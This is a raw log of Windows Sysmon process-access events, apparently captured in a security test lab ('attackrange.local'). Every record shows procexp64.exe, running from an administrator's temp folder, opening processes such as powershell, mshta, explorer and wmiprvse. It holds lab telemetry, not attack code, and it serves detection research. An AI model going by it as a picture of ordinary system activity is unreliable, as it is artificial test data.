CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787071Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C5A2-00000000A301}5220C:\Windows\System32\mshta.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787070Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787069Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787068Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787067Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787066Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787065Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787064Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787063Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787062Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787061Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787060Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787059Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787058Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787057Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787056Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787055Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787054Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787053Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787052Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787051Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787050Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787049Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787048Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:07.642{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 